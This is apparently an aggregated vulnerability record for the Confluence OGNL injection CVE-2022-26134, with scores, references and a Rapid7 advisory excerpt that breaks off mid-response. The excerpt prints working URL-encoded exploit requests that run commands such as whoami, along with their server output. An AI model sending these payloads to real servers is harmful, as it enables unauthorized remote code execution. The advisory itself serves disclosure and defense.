CVE-2022-26134

2022-07-13T00:00:00

Description

In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1. **Recent assessments:** **noraj** at April 15, 2023 7:34pm UTC reported: It’s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment. **jbaines-r7** at June 03, 2022 7:21pm UTC reported: It’s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment. Assessed Attacker Value: 4 Assessed Attacker Value: 4Assessed Attacker Value: 5

{"id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2022-26134", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**noraj** at April 15, 2023 7:34pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "published": "2022-07-13T00:00:00", "modified": "2022-07-13T00:00:00", "epss": [{"cve": "CVE-2018-11776", "epss": 0.97557, "percentile": 0.99996, "modified": "2023-10-17"}, {"cve": "CVE-2021-26084", "epss": 0.97173, "percentile": 0.99735, "modified": "2023-10-18"}, {"cve": "CVE-2022-26134", "epss": 0.97519, "percentile": 0.99984, "modified": "2023-10-18"}, {"cve": "CVE-2022-26314", "epss": 0.00319, "percentile": 0.67098, "modified": "2023-10-18"}], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134", "https://jira.atlassian.com/browse/CONFSERVER-79016", "http://packetstormsecurity.com/files/167432/Confluence-OGNL-Injection-Proof-Of-Concept.html", "http://packetstormsecurity.com/files/167430/Confluence-OGNL-Injection-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html", "http://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html"], "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "immutableFields": [], "lastseen": "2023-10-18T16:36:59", "viewCount": 212, "enchantments": {"score": {"value": 9.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1", "AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "AKAMAIBLOG:6B355C8FD4C2D8E5A670002BC4BD9497", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CONFSERVER-79000", "CONFSERVER-79016"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:E820C062BC9959711E1D1152D8848072", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0849", "CPAI-2021-0548", "CPAI-2022-0297"]}, {"type": "cisa", "idList": ["CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "CISA:71FB648030101FA9B007125DFA636193", "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-11776", "CISA-KEV-CVE-2021-26084", "CISA-KEV-CVE-2022-26134"]}, {"type": "cisco", "idList": ["CISCO-SA-20180823-APACHE-STRUTS"]}, {"type": "cnvd", "idList": ["CNVD-2022-17795"]}, {"type": "cve", "idList": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"]}, {"type": "dsquare", "idList": ["E-666"]}, {"type": "exploitdb", "idList": ["EDB-ID:45260", "EDB-ID:45367", "EDB-ID:50243", "EDB-ID:50952"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE"]}, {"type": "f5", "idList": ["F5:K60499474"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "12691014-3333-5741-80A4-3357BD72D2AC", "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1F907E1E-A975-55B6-BAFC-80A32B2DDAE7", "1F9C946C-1533-5835-B5E8-641EF4FFC145", "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "2444574D-533F-593F-8E0E-68EA2B47EF55", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "252F889F-2BFB-5D8D-B1CD-63075FB7EC34", "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "28E888C4-78E3-5F8D-B316-AB42FED892F9", "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "321617C5-08C5-5919-9510-2571831D052E", "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "423DF4D5-60AF-5663-B196-2A67DD13D226", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "464D6B41-AE5F-5E93-BD26-6E6C8E9F80BC", "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "469B060E-C585-599E-A0D1-AD5D186F70FD", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "506F4ED7-477B-50E3-9250-1C6A31D8C357", "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "53CC55D8-983C-5FA9-AE81-D20750A6612E", "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "594C33E1-9EBF-5B3B-BA76-031ACB500518", "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "5CE439D5-2080-5145-AD7B-BF3F1FB53A0F", "5DB14853-1EDB-5A80-BD98-BB388CC80401", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "66468422-89C0-5AC8-9CEA-6B512338FF7C", "69FAE88E-7F22-5ACC-B555-3441BE00C566", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "7BE60530-0495-5366-846A-73B1A778DBDA", "7C531491-7EB6-51AA-9072-F345BDB61AFD", "83B145E2-F995-5B1C-863E-164839ED1173", "84D5F04A-0DDB-5788-8759-DA99D303B756", "8F6AEAF4-2161-55F7-96CB-003251BDC309", "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "B16D26DB-D60C-5C0C-9452-80112720B442", "B47171B0-339A-582E-8AAC-3B18373664B7", "B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "B8347185-A0AD-5C98-B2DB-599D8BE5EF53", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "CC614155-FD7D-599B-B89C-006B26D76F48", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CFDC15EB-BE4F-5C86-B8B0-C542A791F67D", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hivepro", "idList": ["HIVEPRO:9E33ABD5EAFB3204848DAD28367798A9", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "ibm", "idList": ["20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62"]}, {"type": "ics", "idList": ["AA22-117A", "AA22-279A", "AA23-215A", "ICSA-22-069-04"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:E9D83907E76B2B468512918F211FB65E", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5", "IMPERVABLOG:F2DBFC086ED3B70700CD22E02FB39FC8"]}, {"type": "kitploit", "idList": ["KITPLOIT:3043339745958474082", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:8708017483803645203"]}, {"type": "krebs", "idList": ["KREBS:B3A2371A1AB31AB3CE2E3F1B2243FDC6"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:D798A208C9ABA1078616DD81B6E75F25"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-"]}, {"type": "mmpc", "idList": ["MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:A60AFC5A5E991E303E0397289A086789"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:A60AFC5A5E991E303E0397289A086789"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891264", "MYHACK58:62201891267", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "CISCO-SA-20180823-APACHE-STRUTS-CUPS.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "CISCO-SA-20180823-APACHE-STRUTS-UCM.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "CONFLUENCE_CVE_2022_26134.NBIN", "MYSQL_ENTERPRISE_MONITOR_8_0_3.NASL", "ORACLE_ENTERPRISE_MANAGER_JUL_2020_CPU.NASL", "STRUTS_2_5_17.NASL", "STRUTS_2_5_17_RCE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108792", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310813786"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2019", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2018"]}, {"type": "osv", "idList": ["OSV:GHSA-CR6J-3JP9-RW65"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149086", "PACKETSTORM:149087", "PACKETSTORM:149277", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:167430", "PACKETSTORM:167449"]}, {"type": "prion", "idList": ["PRION:CVE-2021-26084", "PRION:CVE-2022-26134", "PRION:CVE-2022-26314"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776"]}, {"type": "securelist", "idList": ["SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C"]}, {"type": "thn", "idList": ["THN:0488E447E08622B0366A0332F848212D", "THN:080602C4CECD29DACCA496697978CAD0", "THN:1AC8C94468BC3582621B1E56C40127CD", "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:362401076AC227D49D729838DBDC2052", "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "THN:4DE731C9D113C3993C96A773C079023F", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:72352D205E5586C5585536F8661A10E4", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:7FD924637D99697D78D53283817508DA", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:E0B486DA1C8CE77D0DF337E8307100D6", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:F0450E1253FFE5CA527F039D3B3A72BD", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "THN:FF1CD6F91A87ADD45550F34DE9C8204A"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "THREATPOST:0FC293825070B81036932BDB41D793B5", "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "THREATPOST:8C179A769DB315AF46676A862FC3D942", "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E984089A4842B564B374B807AF915A44", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trellix", "idList": ["TRELLIX:341471F990B5DC7BFF1C28F924F10E32"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:B2CE0B51EC84664ADCCD67A2A0DF7033", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-11776", "UB:CVE-2022-26134"]}, {"type": "veracode", "idList": ["VERACODE:7342"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681"]}, {"type": "zdt", "idList": ["1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37778", "1337DAY-ID-37781", "1337DAY-ID-37783"]}]}, "epss": [{"cve": "CVE-2018-11776", "epss": 0.97556, "percentile": 0.99994, "modified": "2023-05-01"}, {"cve": "CVE-2021-26084", "epss": 0.97475, "percentile": 0.99938, "modified": "2023-05-01"}, {"cve": "CVE-2022-26134", "epss": 0.97542, "percentile": 0.99988, "modified": "2023-05-02"}, {"cve": "CVE-2022-26314", "epss": 0.00239, "percentile": 0.60419, "modified": "2023-05-02"}], "vulnersScore": 9.2}, "_state": {"dependencies": 1697652164, "score": 1698846385, "epss": 0}, "_internal": {"score_hash": "3c820d651145c56fb080f9c97f75fd88"}, "attackerkb": {"attackerValue": 4, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": "", "Vendor Advisory": "", "News Article or Blog": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "published": "2022-06-03T02:51:00"}, {"category": "Vendor Advisory", "source_url": "https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "published": "2022-06-03T17:47:00"}, {"category": "Threat Feed", "source_url": "https://inthewild.io/vuln/CVE-2022-26134", "published": "2022-06-03T17:47:00"}, {"category": "News Article or Blog", "source_url": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "published": "2022-06-03T17:47:00"}, {"category": "Other:", "source_url": "https://unit42.paloaltonetworks.com/mirai-variant-v3g4/", "published": "2022-06-03T17:47:00"}, {"category": "News Article or Blog", "source_url": "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "published": "2022-06-04T04:46:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134"], "Miscellaneous": ["https://jira.atlassian.com/browse/CONFSERVER-79016", "http://packetstormsecurity.com/files/167432/Confluence-OGNL-Injection-Proof-Of-Concept.html", "http://packetstormsecurity.com/files/167430/Confluence-OGNL-Injection-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/167431/Through-The-Wire-CVE-2022-26134-Confluence-Proof-Of-Concept.html", "http://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html"]}, "tags": ["common_enterprise", "easy_to_develop", "pre_auth", "default_configuration"], "mitre_vector": {"Initial Access": ["Exploit Public-Facing Application(Validated)"]}, "last_activity": "2023-04-15T19:34:00"}

{"rapid7blog": [{"lastseen": "2022-06-07T01:56:25", "description": "![Active Exploitation of Confluence CVE-2022-26134](https://blog.rapid7.com/content/images/2022/06/confluence-etr.jpg)\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < 